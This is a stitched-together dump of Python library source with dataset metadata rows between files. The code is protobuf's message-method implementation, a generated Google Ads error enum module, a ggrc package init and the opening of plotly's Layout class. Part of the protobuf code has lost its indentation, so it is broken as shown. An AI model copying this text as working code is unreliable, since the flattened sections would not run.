  if field_descriptor.label == _FieldDescriptor.LABEL_REPEATED:
    # Repeated fields are listed only when non-empty.
    return bool(value)
  if field_descriptor.cpp_type == _FieldDescriptor.CPPTYPE_MESSAGE:
    # Sub-messages are listed only when actually set.
    return value._is_present_in_parent
  return True
def _AddListFieldsMethod(message_descriptor, cls):
  """Helper for _AddMessageMethods(): installs ListFields()."""
  def ListFields(self):
    # Present fields only, ordered by field number.
    return sorted(
        (entry for entry in self._fields.items() if _IsPresent(entry)),
        key=lambda entry: entry[0].number)
  cls.ListFields = ListFields
# Error templates for HasField(); proto3 only tracks presence for
# non-repeated submessage (and oneof-member) fields, hence the different
# wording.
_Proto3HasError = 'Protocol message has no non-repeated submessage field "%s"'
_Proto2HasError = 'Protocol message has no non-repeated field "%s"'
def _AddHasFieldMethod(message_descriptor, cls):
  """Helper for _AddMessageMethods(): installs HasField().

  Precomputes the table of names for which presence can be queried:
  non-repeated fields (for proto2), or non-repeated submessage/oneof-member
  fields (for proto3); oneof names themselves are added for proto2.
  """
  is_proto3 = (message_descriptor.syntax == "proto3")
  error_msg = _Proto3HasError if is_proto3 else _Proto2HasError

  hassable_fields = {}
  for field in message_descriptor.fields:
    if field.label == _FieldDescriptor.LABEL_REPEATED:
      continue
    # For proto3, only submessages and fields inside a oneof have presence.
    if (is_proto3 and field.cpp_type != _FieldDescriptor.CPPTYPE_MESSAGE and
        not field.containing_oneof):
      continue
    hassable_fields[field.name] = field

  if not is_proto3:
    # Fields inside oneofs are never repeated (enforced by the compiler).
    for oneof in message_descriptor.oneofs:
      hassable_fields[oneof.name] = oneof

  def HasField(self, field_name):
    try:
      field = hassable_fields[field_name]
    except KeyError:
      raise ValueError(error_msg % field_name)

    if isinstance(field, descriptor_mod.OneofDescriptor):
      try:
        # A oneof "has" a value iff its currently-set member field does.
        return HasField(self, self._oneofs[field].name)
      except KeyError:
        return False
    else:
      if field.cpp_type == _FieldDescriptor.CPPTYPE_MESSAGE:
        value = self._fields.get(field)
        return value is not None and value._is_present_in_parent
      else:
        return field in self._fields

  cls.HasField = HasField
def _AddClearFieldMethod(message_descriptor, cls):
  """Helper for _AddMessageMethods(): installs ClearField().

  ClearField() accepts either a field name or a oneof name; clearing a oneof
  clears whichever member field is currently set (a no-op if none is).
  """
  def ClearField(self, field_name):
    try:
      field = message_descriptor.fields_by_name[field_name]
    except KeyError:
      try:
        field = message_descriptor.oneofs_by_name[field_name]
        if field in self._oneofs:
          # Resolve the oneof to its currently-set member field.
          field = self._oneofs[field]
        else:
          return
      except KeyError:
        raise ValueError('Protocol message %s() has no "%s" field.' %
                         (message_descriptor.name, field_name))

    if field in self._fields:
      # To match the C++ implementation, we need to invalidate iterators
      # for map fields when ClearField() happens.
      if hasattr(self._fields[field], 'InvalidateIterators'):
        self._fields[field].InvalidateIterators()

      # Note:  If the field is a sub-message, its listener will still point
      #   at us.  That's fine, because the worst than can happen is that it
      #   will call _Modified() and invalidate our byte size.  Big deal.
      del self._fields[field]

      if self._oneofs.get(field.containing_oneof, None) is field:
        del self._oneofs[field.containing_oneof]

    # Always call _Modified() -- even if nothing was changed, this is
    # a mutating method, and thus calling it should cause the field to become
    # present in the parent message.
    self._Modified()

  cls.ClearField = ClearField
def _AddClearExtensionMethod(cls):
  """Helper for _AddMessageMethods(): installs ClearExtension()."""
  def ClearExtension(self, extension_handle):
    _VerifyExtensionHandle(self, extension_handle)

    # Similar to ClearField(), above: drop the stored value (if any) and
    # mark the message modified unconditionally.
    self._fields.pop(extension_handle, None)
    self._Modified()

  cls.ClearExtension = ClearExtension
def _AddHasExtensionMethod(cls):
  """Helper for _AddMessageMethods(): installs HasExtension()."""
  def HasExtension(self, extension_handle):
    _VerifyExtensionHandle(self, extension_handle)
    if extension_handle.label == _FieldDescriptor.LABEL_REPEATED:
      raise KeyError('"%s" is repeated.' % extension_handle.full_name)

    if extension_handle.cpp_type != _FieldDescriptor.CPPTYPE_MESSAGE:
      return extension_handle in self._fields
    # Message-typed extensions are "had" only when actually present.
    value = self._fields.get(extension_handle)
    return value is not None and value._is_present_in_parent

  cls.HasExtension = HasExtension
def _InternalUnpackAny(msg):
  """Unpacks Any message and returns the unpacked message.

  This internal method is different from public Any Unpack method which takes
  the target message as argument. _InternalUnpackAny method does not have
  target message type and need to find the message type in descriptor pool.

  Args:
    msg: An Any message to be unpacked.

  Returns:
    The unpacked message, or None when msg.type_url is empty or the type is
    not found in the default descriptor pool.
  """
  # TODO(amauryfa): Don't use the factory of generated messages.
  # To make Any work with custom factories, use the message factory of the
  # parent message.
  # pylint: disable=g-import-not-at-top
  from google.protobuf import symbol_database
  factory = symbol_database.Default()

  type_url = msg.type_url
  if not type_url:
    return None

  # TODO(haberman): For now we just strip the hostname.  Better logic will be
  # required.
  type_name = type_url.split('/')[-1]
  descriptor = factory.pool.FindMessageTypeByName(type_name)

  if descriptor is None:
    return None

  message_class = factory.GetPrototype(descriptor)
  message = message_class()

  message.ParseFromString(msg.value)
  return message
def _AddEqualsMethod(message_descriptor, cls):
  """Helper for _AddMessageMethods(): installs __eq__().

  Two messages are equal when they have the same descriptor, the same
  present fields with equal values, and the same unknown fields (order
  ignored).  Any messages additionally compare equal when their unpacked
  payloads compare equal.
  """
  def __eq__(self, other):
    if (not isinstance(other, message_mod.Message) or
        other.DESCRIPTOR != self.DESCRIPTOR):
      return False

    if self is other:
      return True

    if self.DESCRIPTOR.full_name == _AnyFullTypeName:
      any_a = _InternalUnpackAny(self)
      any_b = _InternalUnpackAny(other)
      if any_a and any_b:
        return any_a == any_b
      # If either side can't be unpacked, fall through to the field-level
      # comparison below.

    if not self.ListFields() == other.ListFields():
      return False

    # Sort unknown fields because their order shouldn't affect equality test.
    unknown_fields = list(self._unknown_fields)
    unknown_fields.sort()
    other_unknown_fields = list(other._unknown_fields)
    other_unknown_fields.sort()

    return unknown_fields == other_unknown_fields

  cls.__eq__ = __eq__
def _AddStrMethod(message_descriptor, cls):
  """Helper for _AddMessageMethods(): installs __str__ (text format)."""
  cls.__str__ = lambda self: text_format.MessageToString(self)
def _AddReprMethod(message_descriptor, cls):
  """Helper for _AddMessageMethods(): installs __repr__ (same as __str__)."""
  def _ReprImpl(self):
    return text_format.MessageToString(self)
  cls.__repr__ = _ReprImpl
def _AddUnicodeMethod(unused_message_descriptor, cls):
  """Helper for _AddMessageMethods(): installs __unicode__ (Python 2)."""
  def _UnicodeImpl(self):
    # Render as UTF-8 text format, then decode to a unicode string.
    return text_format.MessageToString(self, as_utf8=True).decode('utf-8')
  cls.__unicode__ = _UnicodeImpl
def _BytesForNonRepeatedElement(value, field_number, field_type):
  """Returns the number of bytes needed to serialize a non-repeated element.
  The returned byte count includes space for tag information and any
  other additional space associated with serializing value.

  Args:
    value: Value we're serializing.
    field_number: Field number of this value.  (Since the field number
      is stored as part of a varint-encoded tag, this has an impact
      on the total bytes required to serialize the value).
    field_type: The type of the field.  One of the TYPE_* constants
      within FieldDescriptor.

  Raises:
    message_mod.EncodeError: if field_type has no registered size function.
  """
  try:
    fn = type_checkers.TYPE_TO_BYTE_SIZE_FN[field_type]
    return fn(field_number, value)
  except KeyError:
    raise message_mod.EncodeError('Unrecognized field type: %d' % field_type)
def _AddByteSizeMethod(message_descriptor, cls):
"""Helper for _AddMessageMethods()."""
def ByteSize(self):
if not self._cached_byte_size_dirty:
return self._cached_byte_size
size = 0
for field_descriptor, field_value in self.ListFields():
size += field_descriptor._sizer(field_value)
for tag_bytes, value_bytes in self._unknown_fields:
size += len(tag_bytes) + len(value_bytes)
self._cached_byte_size = size
self._cached_byte_size_dirty = False
self._listener_for_children.dirty = False
return size
cls.ByteSize = ByteSize
def _AddSerializeToStringMethod(message_descriptor, cls):
"""Helper for _AddMessageMethods()."""
def SerializeToString(self):
# Check if the message has all of its required fields set.
errors = []
if not self.IsInitialized():
raise message_mod.EncodeError(
'Message %s is missing required fields: %s' % (
self.DESCRIPTOR.full_name, ','.join(self.FindInitializationErrors())))
return self.SerializePartialToString()
cls.SerializeToString = SerializeToString
def _AddSerializePartialToStringMethod(message_descriptor, cls):
"""Helper for _AddMessageMethods()."""
def SerializePartialToString(self):
out = BytesIO()
self._InternalSerialize(out.write)
return out.getvalue()
cls.SerializePartialToString = SerializePartialToString
def InternalSerialize(self, write_bytes):
for field_descriptor, field_value in self.ListFields():
field_descriptor._encoder(write_bytes, field_value)
for tag_bytes, value_bytes in self._unknown_fields:
write_bytes(tag_bytes)
write_bytes(value_bytes)
cls._InternalSerialize = InternalSerialize
def _AddMergeFromStringMethod(message_descriptor, cls):
"""Helper for _AddMessageMethods()."""
def MergeFromString(self, serialized):
length = len(serialized)
try:
if self._InternalParse(serialized, 0, length) != length:
# The only reason _InternalParse would return early is if it
# encountered an end-group tag.
raise message_mod.DecodeError('Unexpected end-group tag.')
except (IndexError, TypeError):
# Now ord(buf[p:p+1]) == ord('') gets TypeError.
raise message_mod.DecodeError('Truncated message.')
except struct.error as e:
raise message_mod.DecodeError(e)
return length # Return this for legacy reasons.
cls.MergeFromString = MergeFromString
local_ReadTag = decoder.ReadTag
local_SkipField = decoder.SkipField
decoders_by_tag = cls._decoders_by_tag
is_proto3 = message_descriptor.syntax == "proto3"
def InternalParse(self, buffer, pos, end):
self._Modified()
field_dict = self._fields
unknown_field_list = self._unknown_fields
while pos != end:
(tag_bytes, new_pos) = local_ReadTag(buffer, pos)
field_decoder, field_desc = decoders_by_tag.get(tag_bytes, (None, None))
if field_decoder is None:
value_start_pos = new_pos
new_pos = local_SkipField(buffer, new_pos, end, tag_bytes)
if new_pos == -1:
return pos
if not is_proto3:
if not unknown_field_list:
unknown_field_list = self._unknown_fields = []
unknown_field_list.append(
(tag_bytes, buffer[value_start_pos:new_pos]))
pos = new_pos
else:
pos = field_decoder(buffer, new_pos, end, self, field_dict)
if field_desc:
self._UpdateOneofState(field_desc)
return pos
cls._InternalParse = InternalParse
def _AddIsInitializedMethod(message_descriptor, cls):
"""Adds the IsInitialized and FindInitializationError methods to the
protocol message class."""
required_fields = [field for field in message_descriptor.fields
if field.label == _FieldDescriptor.LABEL_REQUIRED]
def IsInitialized(self, errors=None):
"""Checks if all required fields of a message are set.
Args:
errors: A list which, if provided, will be populated with the field
paths of all missing required fields.
Returns:
True iff the specified message has all required fields set.
"""
# Performance is critical so we avoid HasField() and ListFields().
for field in required_fields:
if (field not in self._fields or
(field.cpp_type == _FieldDescriptor.CPPTYPE_MESSAGE and
not self._fields[field]._is_present_in_parent)):
if errors is not None:
errors.extend(self.FindInitializationErrors())
return False
for field, value in list(self._fields.items()): # dict can change size!
if field.cpp_type == _FieldDescriptor.CPPTYPE_MESSAGE:
if field.label == _FieldDescriptor.LABEL_REPEATED:
if (field.message_type.has_options and
field.message_type.GetOptions().map_entry):
continue
for element in value:
if not element.IsInitialized():
if errors is not None:
errors.extend(self.FindInitializationErrors())
return False
elif value._is_present_in_parent and not value.IsInitialized():
if errors is not None:
errors.extend(self.FindInitializationErrors())
return False
return True
cls.IsInitialized = IsInitialized
def FindInitializationErrors(self):
"""Finds required fields which are not initialized.
Returns:
A list of strings. Each string is a path to an uninitialized field from
the top-level message, e.g. "foo.bar[5].baz".
"""
errors = [] # simplify things
for field in required_fields:
if not self.HasField(field.name):
errors.append(field.name)
for field, value in self.ListFields():
if field.cpp_type == _FieldDescriptor.CPPTYPE_MESSAGE:
if field.is_extension:
name = "(%s)" % field.full_name
else:
name = field.name
if _IsMapField(field):
if _IsMessageMapField(field):
for key in value:
element = value[key]
prefix = "%s[%s]." % (name, key)
sub_errors = element.FindInitializationErrors()
errors += [prefix + error for error in sub_errors]
else:
# ScalarMaps can't have any initialization errors.
pass
elif field.label == _FieldDescriptor.LABEL_REPEATED:
for i in range(len(value)):
element = value[i]
prefix = "%s[%d]." % (name, i)
sub_errors = element.FindInitializationErrors()
errors += [prefix + error for error in sub_errors]
else:
prefix = name + "."
sub_errors = value.FindInitializationErrors()
errors += [prefix + error for error in sub_errors]
return errors
cls.FindInitializationErrors = FindInitializationErrors
def _AddMergeFromMethod(cls):
LABEL_REPEATED = _FieldDescriptor.LABEL_REPEATED
CPPTYPE_MESSAGE = _FieldDescriptor.CPPTYPE_MESSAGE
def MergeFrom(self, msg):
if not isinstance(msg, cls):
raise TypeError(
"Parameter to MergeFrom() must be instance of same class: "
'expected %s got %s.' % (cls.__name__, msg.__class__.__name__))
assert msg is not self
self._Modified()
fields = self._fields
for field, value in msg._fields.items():
if field.label == LABEL_REPEATED:
field_value = fields.get(field)
if field_value is None:
# Construct a new object to represent this field.
field_value = field._default_constructor(self)
fields[field] = field_value
field_value.MergeFrom(value)
elif field.cpp_type == CPPTYPE_MESSAGE:
if value._is_present_in_parent:
field_value = fields.get(field)
if field_value is None:
# Construct a new object to represent this field.
field_value = field._default_constructor(self)
fields[field] = field_value
field_value.MergeFrom(value)
else:
self._fields[field] = value
if field.containing_oneof:
self._UpdateOneofState(field)
if msg._unknown_fields:
if not self._unknown_fields:
self._unknown_fields = []
self._unknown_fields.extend(msg._unknown_fields)
cls.MergeFrom = MergeFrom
def _AddWhichOneofMethod(message_descriptor, cls):
def WhichOneof(self, oneof_name):
"""Returns the name of the currently set field inside a oneof, or None."""
try:
field = message_descriptor.oneofs_by_name[oneof_name]
except KeyError:
raise ValueError(
'Protocol message has no oneof "%s" field.' % oneof_name)
nested_field = self._oneofs.get(field, None)
if nested_field is not None and self.HasField(nested_field.name):
return nested_field.name
else:
return None
cls.WhichOneof = WhichOneof
def _AddReduceMethod(cls):
def __reduce__(self): # pylint: disable=invalid-name
return (type(self), (), self.__getstate__())
cls.__reduce__ = __reduce__
def _Clear(self):
# Clear fields.
self._fields = {}
self._unknown_fields = ()
self._oneofs = {}
self._Modified()
def _DiscardUnknownFields(self):
self._unknown_fields = []
for field, value in self.ListFields():
if field.cpp_type == _FieldDescriptor.CPPTYPE_MESSAGE:
if field.label == _FieldDescriptor.LABEL_REPEATED:
for sub_message in value:
sub_message.DiscardUnknownFields()
else:
value.DiscardUnknownFields()
def _SetListener(self, listener):
if listener is None:
self._listener = message_listener_mod.NullMessageListener()
else:
self._listener = listener
def _AddMessageMethods(message_descriptor, cls):
"""Adds implementations of all Message methods to cls."""
_AddListFieldsMethod(message_descriptor, cls)
_AddHasFieldMethod(message_descriptor, cls)
_AddClearFieldMethod(message_descriptor, cls)
if message_descriptor.is_extendable:
_AddClearExtensionMethod(cls)
_AddHasExtensionMethod(cls)
_AddEqualsMethod(message_descriptor, cls)
_AddStrMethod(message_descriptor, cls)
_AddReprMethod(message_descriptor, cls)
_AddUnicodeMethod(message_descriptor, cls)
_AddByteSizeMethod(message_descriptor, cls)
_AddSerializeToStringMethod(message_descriptor, cls)
_AddSerializePartialToStringMethod(message_descriptor, cls)
_AddMergeFromStringMethod(message_descriptor, cls)
_AddIsInitializedMethod(message_descriptor, cls)
_AddMergeFromMethod(cls)
_AddWhichOneofMethod(message_descriptor, cls)
_AddReduceMethod(cls)
# Adds methods which do not depend on cls.
cls.Clear = _Clear
cls.DiscardUnknownFields = _DiscardUnknownFields
cls._SetListener = _SetListener
def _AddPrivateHelperMethods(message_descriptor, cls):
"""Adds implementation of private helper methods to cls."""
def Modified(self):
"""Sets the _cached_byte_size_dirty bit to true,
and propagates this to our listener iff this was a state change.
"""
# Note: Some callers check _cached_byte_size_dirty before calling
# _Modified() as an extra optimization. So, if this method is ever
# changed such that it does stuff even when _cached_byte_size_dirty is
# already true, the callers need to be updated.
if not self._cached_byte_size_dirty:
self._cached_byte_size_dirty = True
self._listener_for_children.dirty = True
self._is_present_in_parent = True
self._listener.Modified()
def _UpdateOneofState(self, field):
"""Sets field as the active field in its containing oneof.
Will also delete currently active field in the oneof, if it is different
from the argument. Does not mark the message as modified.
"""
other_field = self._oneofs.setdefault(field.containing_oneof, field)
if other_field is not field:
del self._fields[other_field]
self._oneofs[field.containing_oneof] = field
cls._Modified = Modified
cls.SetInParent = Modified
cls._UpdateOneofState = _UpdateOneofState
class _Listener(object):
"""MessageListener implementation that a parent message registers with its
child message.
In order to support semantics like:
foo.bar.baz.qux = 23
assert foo.HasField('bar')
...child objects must have back references to their parents.
This helper class is at the heart of this support.
"""
def __init__(self, parent_message):
"""Args:
parent_message: The message whose _Modified() method we should call when
we receive Modified() messages.
"""
# This listener establishes a back reference from a child (contained) object
# to its parent (containing) object. We make this a weak reference to avoid
# creating cyclic garbage when the client finishes with the 'parent' object
# in the tree.
if isinstance(parent_message, weakref.ProxyType):
self._parent_message_weakref = parent_message
else:
self._parent_message_weakref = weakref.proxy(parent_message)
# As an optimization, we also indicate directly on the listener whether
# or not the parent message is dirty. This way we can avoid traversing
# up the tree in the common case.
self.dirty = False
def Modified(self):
if self.dirty:
return
try:
# Propagate the signal to our parents iff this is the first field set.
self._parent_message_weakref._Modified()
except ReferenceError:
# We can get here if a client has kept a reference to a child object,
# and is now setting a field on it, but the child's parent has been
# garbage-collected. This is not an error.
pass
class _OneofListener(_Listener):
"""Special listener implementation for setting composite oneof fields."""
def __init__(self, parent_message, field):
"""Args:
parent_message: The message whose _Modified() method we should call when
we receive Modified() messages.
field: The descriptor of the field being set in the parent message.
"""
super(_OneofListener, self).__init__(parent_message)
self._field = field
def Modified(self):
"""Also updates the state of the containing oneof in the parent message."""
try:
self._parent_message_weakref._UpdateOneofState(self._field)
super(_OneofListener, self).Modified()
except ReferenceError:
pass
# TODO(robinson): Move elsewhere? This file is getting pretty ridiculous...
# TODO(robinson): Unify error handling of "unknown extension" crap.
# TODO(robinson): Support iteritems()-style iteration over all
# extensions with the "has" bits turned on?
class _ExtensionDict(object):
"""Dict-like container for supporting an indexable "Extensions"
field on proto instances.
Note that in all cases we expect extension handles to be
FieldDescriptors.
"""
def __init__(self, extended_message):
"""extended_message: Message instance for which we are the Extensions dict.
"""
self._extended_message = extended_message
def __getitem__(self, extension_handle):
"""Returns the current value of the given extension handle."""
_VerifyExtensionHandle(self._extended_message, extension_handle)
result = self._extended_message._fields.get(extension_handle)
if result is not None:
return result
if extension_handle.label == _FieldDescriptor.LABEL_REPEATED:
result = extension_handle._default_constructor(self._extended_message)
elif extension_handle.cpp_type == _FieldDescriptor.CPPTYPE_MESSAGE:
result = extension_handle.message_type._concrete_class()
try:
result._SetListener(self._extended_message._listener_for_children)
except ReferenceError:
pass
else:
# Singular scalar -- just return the default without inserting into the
# dict.
return extension_handle.default_value
# Atomically check if another thread has preempted us and, if not, swap
# in the new object we just created. If someone has preempted us, we
# take that object and discard ours.
# WARNING: We are relying on setdefault() being atomic. This is true
# in CPython but we haven't investigated others. This warning appears
# in several other locations in this file.
result = self._extended_message._fields.setdefault(
extension_handle, result)
return result
def __eq__(self, other):
if not isinstance(other, self.__class__):
return False
my_fields = self._extended_message.ListFields()
other_fields = other._extended_message.ListFields()
# Get rid of non-extension fields.
my_fields = [ field for field in my_fields if field.is_extension ]
other_fields = [ field for field in other_fields if field.is_extension ]
return my_fields == other_fields
def __ne__(self, other):
return not self == other
def __hash__(self):
raise TypeError('unhashable object')
# Note that this is only meaningful for non-repeated, scalar extension
# fields. Note also that we may have to call _Modified() when we do
# successfully set a field this way, to set any necssary "has" bits in the
# ancestors of the extended message.
def __setitem__(self, extension_handle, value):
"""If extension_handle specifies a non-repeated, scalar extension
field, sets the value of that field.
"""
_VerifyExtensionHandle(self._extended_message, extension_handle)
if (extension_handle.label == _FieldDescriptor.LABEL_REPEATED or
extension_handle.cpp_type == _FieldDescriptor.CPPTYPE_MESSAGE):
raise TypeError(
'Cannot assign to extension "%s" because it is a repeated or '
'composite type.' % extension_handle.full_name)
# It's slightly wasteful to lookup the type checker each time,
# but we expect this to be a vanishingly uncommon case anyway.
type_checker = type_checkers.GetTypeChecker(extension_handle)
# pylint: disable=protected-access
self._extended_message._fields[extension_handle] = (
type_checker.CheckValue(value))
self._extended_message._Modified()
def _FindExtensionByName(self, name):
"""Tries to find a known extension with the specified name.
Args:
name: Extension full name.
Returns:
Extension field descriptor.
"""
return self._extended_message._extensions_by_name.get(name, None)
def _FindExtensionByNumber(self, number):
"""Tries to find a known extension with the field number.
Args:
number: Extension field number.
Returns:
Extension field descriptor.
"""
return self._extended_message._extensions_by_number.get(number, None)
| 36.925926 | 80 | 0.719703 |
e36f30f59f3375e746e9dcaafc157e55197654f4 | 3,787 | py | Python | google/ads/google_ads/v5/proto/errors/null_error_pb2.py | arammaliachi/google-ads-python | a4fe89567bd43eb784410523a6306b5d1dd9ee67 | [
"Apache-2.0"
] | 1 | 2021-04-09T04:28:47.000Z | 2021-04-09T04:28:47.000Z | google/ads/google_ads/v5/proto/errors/null_error_pb2.py | arammaliachi/google-ads-python | a4fe89567bd43eb784410523a6306b5d1dd9ee67 | [
"Apache-2.0"
] | null | null | null | google/ads/google_ads/v5/proto/errors/null_error_pb2.py | arammaliachi/google-ads-python | a4fe89567bd43eb784410523a6306b5d1dd9ee67 | [
"Apache-2.0"
] | null | null | null | # -*- coding: utf-8 -*-
# Generated by the protocol buffer compiler. DO NOT EDIT!
# source: google/ads/googleads_v5/proto/errors/null_error.proto
from google.protobuf import descriptor as _descriptor
from google.protobuf import message as _message
from google.protobuf import reflection as _reflection
from google.protobuf import symbol_database as _symbol_database
# @@protoc_insertion_point(imports)
_sym_db = _symbol_database.Default()
from google.api import annotations_pb2 as google_dot_api_dot_annotations__pb2
DESCRIPTOR = _descriptor.FileDescriptor(
name='google/ads/googleads_v5/proto/errors/null_error.proto',
package='google.ads.googleads.v5.errors',
syntax='proto3',
serialized_options=b'\n\"com.google.ads.googleads.v5.errorsB\016NullErrorProtoP\001ZDgoogle.golang.org/genproto/googleapis/ads/googleads/v5/errors;errors\242\002\003GAA\252\002\036Google.Ads.GoogleAds.V5.Errors\312\002\036Google\\Ads\\GoogleAds\\V5\\Errors\352\002\"Google::Ads::GoogleAds::V5::Errors',
create_key=_descriptor._internal_create_key,
serialized_pb=b'\n5google/ads/googleads_v5/proto/errors/null_error.proto\x12\x1egoogle.ads.googleads.v5.errors\x1a\x1cgoogle/api/annotations.proto\"L\n\rNullErrorEnum\";\n\tNullError\x12\x0f\n\x0bUNSPECIFIED\x10\x00\x12\x0b\n\x07UNKNOWN\x10\x01\x12\x10\n\x0cNULL_CONTENT\x10\x02\x42\xe9\x01\n\"com.google.ads.googleads.v5.errorsB\x0eNullErrorProtoP\x01ZDgoogle.golang.org/genproto/googleapis/ads/googleads/v5/errors;errors\xa2\x02\x03GAA\xaa\x02\x1eGoogle.Ads.GoogleAds.V5.Errors\xca\x02\x1eGoogle\\Ads\\GoogleAds\\V5\\Errors\xea\x02\"Google::Ads::GoogleAds::V5::Errorsb\x06proto3'
,
dependencies=[google_dot_api_dot_annotations__pb2.DESCRIPTOR,])
_NULLERRORENUM_NULLERROR = _descriptor.EnumDescriptor(
name='NullError',
full_name='google.ads.googleads.v5.errors.NullErrorEnum.NullError',
filename=None,
file=DESCRIPTOR,
create_key=_descriptor._internal_create_key,
values=[
_descriptor.EnumValueDescriptor(
name='UNSPECIFIED', index=0, number=0,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
_descriptor.EnumValueDescriptor(
name='UNKNOWN', index=1, number=1,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
_descriptor.EnumValueDescriptor(
name='NULL_CONTENT', index=2, number=2,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
],
containing_type=None,
serialized_options=None,
serialized_start=136,
serialized_end=195,
)
_sym_db.RegisterEnumDescriptor(_NULLERRORENUM_NULLERROR)
_NULLERRORENUM = _descriptor.Descriptor(
name='NullErrorEnum',
full_name='google.ads.googleads.v5.errors.NullErrorEnum',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
],
extensions=[
],
nested_types=[],
enum_types=[
_NULLERRORENUM_NULLERROR,
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=119,
serialized_end=195,
)
_NULLERRORENUM_NULLERROR.containing_type = _NULLERRORENUM
DESCRIPTOR.message_types_by_name['NullErrorEnum'] = _NULLERRORENUM
_sym_db.RegisterFileDescriptor(DESCRIPTOR)
NullErrorEnum = _reflection.GeneratedProtocolMessageType('NullErrorEnum', (_message.Message,), {
'DESCRIPTOR' : _NULLERRORENUM,
'__module__' : 'google.ads.googleads_v5.proto.errors.null_error_pb2'
,
'__doc__': """Container for enum describing possible null errors.""",
# @@protoc_insertion_point(class_scope:google.ads.googleads.v5.errors.NullErrorEnum)
})
_sym_db.RegisterMessage(NullErrorEnum)
DESCRIPTOR._options = None
# @@protoc_insertion_point(module_scope)
| 37.49505 | 583 | 0.784262 |
67ee8ee2ecad5411e464e1c3925a386a07aad4ee | 211 | py | Python | src/ggrc/__init__.py | HLD/ggrc-core | 9bdc0fc6ca9e252f4919db682d80e360d5581eb4 | [
"ECL-2.0",
"Apache-2.0"
] | null | null | null | src/ggrc/__init__.py | HLD/ggrc-core | 9bdc0fc6ca9e252f4919db682d80e360d5581eb4 | [
"ECL-2.0",
"Apache-2.0"
] | 10 | 2018-07-06T00:04:23.000Z | 2021-02-26T21:13:20.000Z | src/ggrc/__init__.py | HLD/ggrc-core | 9bdc0fc6ca9e252f4919db682d80e360d5581eb4 | [
"ECL-2.0",
"Apache-2.0"
] | 1 | 2017-11-11T22:16:56.000Z | 2017-11-11T22:16:56.000Z | # Copyright (C) 2017 Google Inc.
# Licensed under http://www.apache.org/licenses/LICENSE-2.0 <see LICENSE file>
"""Main GGRC module"""
from ggrc import bootstrap
db = bootstrap.get_db()
__all__ = [
db
]
| 16.230769 | 78 | 0.691943 |
44d22c1abc256e8faef7f13f72edf84e91331703 | 188,614 | py | Python | plotly/graph_objs/_layout.py | gnestor/plotly.py | a8ae062795ddbf9867b8578fe6d9e244948c15ff | [
"MIT"
] | 2 | 2018-12-03T15:20:42.000Z | 2018-12-03T15:20:47.000Z | plotly/graph_objs/_layout.py | gnestor/plotly.py | a8ae062795ddbf9867b8578fe6d9e244948c15ff | [
"MIT"
] | null | null | null | plotly/graph_objs/_layout.py | gnestor/plotly.py | a8ae062795ddbf9867b8578fe6d9e244948c15ff | [
"MIT"
] | 2 | 2019-06-17T01:35:57.000Z | 2020-11-03T01:07:19.000Z | from plotly.basedatatypes import BaseLayoutType
import copy
class Layout(BaseLayoutType):
# angularaxis
# -----------
@property
def angularaxis(self):
"""
The 'angularaxis' property is an instance of AngularAxis
that may be specified as:
- An instance of plotly.graph_objs.layout.AngularAxis
- A dict of string/value properties that will be passed
to the AngularAxis constructor
Supported dict properties:
domain
Polar chart subplots are not supported yet.
This key has currently no effect.
endpadding
Legacy polar charts are deprecated! Please
switch to "polar" subplots.
range
Legacy polar charts are deprecated! Please
switch to "polar" subplots. Defines the start
and end point of this angular axis.
showline
Legacy polar charts are deprecated! Please
switch to "polar" subplots. Determines whether
or not the line bounding this angular axis will
be shown on the figure.
showticklabels
Legacy polar charts are deprecated! Please
switch to "polar" subplots. Determines whether
or not the angular axis ticks will feature tick
labels.
tickcolor
Legacy polar charts are deprecated! Please
switch to "polar" subplots. Sets the color of
the tick lines on this angular axis.
ticklen
Legacy polar charts are deprecated! Please
switch to "polar" subplots. Sets the length of
the tick lines on this angular axis.
tickorientation
Legacy polar charts are deprecated! Please
switch to "polar" subplots. Sets the
orientation (from the paper perspective) of the
angular axis tick labels.
ticksuffix
Legacy polar charts are deprecated! Please
switch to "polar" subplots. Sets the length of
the tick lines on this angular axis.
visible
Legacy polar charts are deprecated! Please
switch to "polar" subplots. Determines whether
or not this axis will be visible.
Returns
-------
plotly.graph_objs.layout.AngularAxis
"""
return self['angularaxis']
@angularaxis.setter
def angularaxis(self, val):
self['angularaxis'] = val
# annotations
# -----------
@property
def annotations(self):
"""
The 'annotations' property is a tuple of instances of
Annotation that may be specified as:
- A list or tuple of instances of plotly.graph_objs.layout.Annotation
- A list or tuple of dicts of string/value properties that
will be passed to the Annotation constructor
Supported dict properties:
align
Sets the horizontal alignment of the `text`
within the box. Has an effect only if `text`
spans more two or more lines (i.e. `text`
contains one or more <br> HTML tags) or if an
explicit width is set to override the text
width.
arrowcolor
Sets the color of the annotation arrow.
arrowhead
Sets the end annotation arrow head style.
arrowside
Sets the annotation arrow head position.
arrowsize
Sets the size of the end annotation arrow head,
relative to `arrowwidth`. A value of 1
(default) gives a head about 3x as wide as the
line.
arrowwidth
Sets the width (in px) of annotation arrow
line.
ax
Sets the x component of the arrow tail about
the arrow head. If `axref` is `pixel`, a
positive (negative) component corresponds to
an arrow pointing from right to left (left to
right). If `axref` is an axis, this is an
absolute value on that axis, like `x`, NOT a
relative value.
axref
Indicates in what terms the tail of the
annotation (ax,ay) is specified. If `pixel`,
`ax` is a relative offset in pixels from `x`.
If set to an x axis id (e.g. "x" or "x2"), `ax`
is specified in the same terms as that axis.
This is useful for trendline annotations which
should continue to indicate the correct trend
when zoomed.
ay
Sets the y component of the arrow tail about
the arrow head. If `ayref` is `pixel`, a
positive (negative) component corresponds to
an arrow pointing from bottom to top (top to
bottom). If `ayref` is an axis, this is an
absolute value on that axis, like `y`, NOT a
relative value.
ayref
Indicates in what terms the tail of the
annotation (ax,ay) is specified. If `pixel`,
`ay` is a relative offset in pixels from `y`.
If set to a y axis id (e.g. "y" or "y2"), `ay`
is specified in the same terms as that axis.
This is useful for trendline annotations which
should continue to indicate the correct trend
when zoomed.
bgcolor
Sets the background color of the annotation.
bordercolor
Sets the color of the border enclosing the
annotation `text`.
borderpad
Sets the padding (in px) between the `text` and
the enclosing border.
borderwidth
Sets the width (in px) of the border enclosing
the annotation `text`.
captureevents
Determines whether the annotation text box
captures mouse move and click events, or allows
those events to pass through to data points in
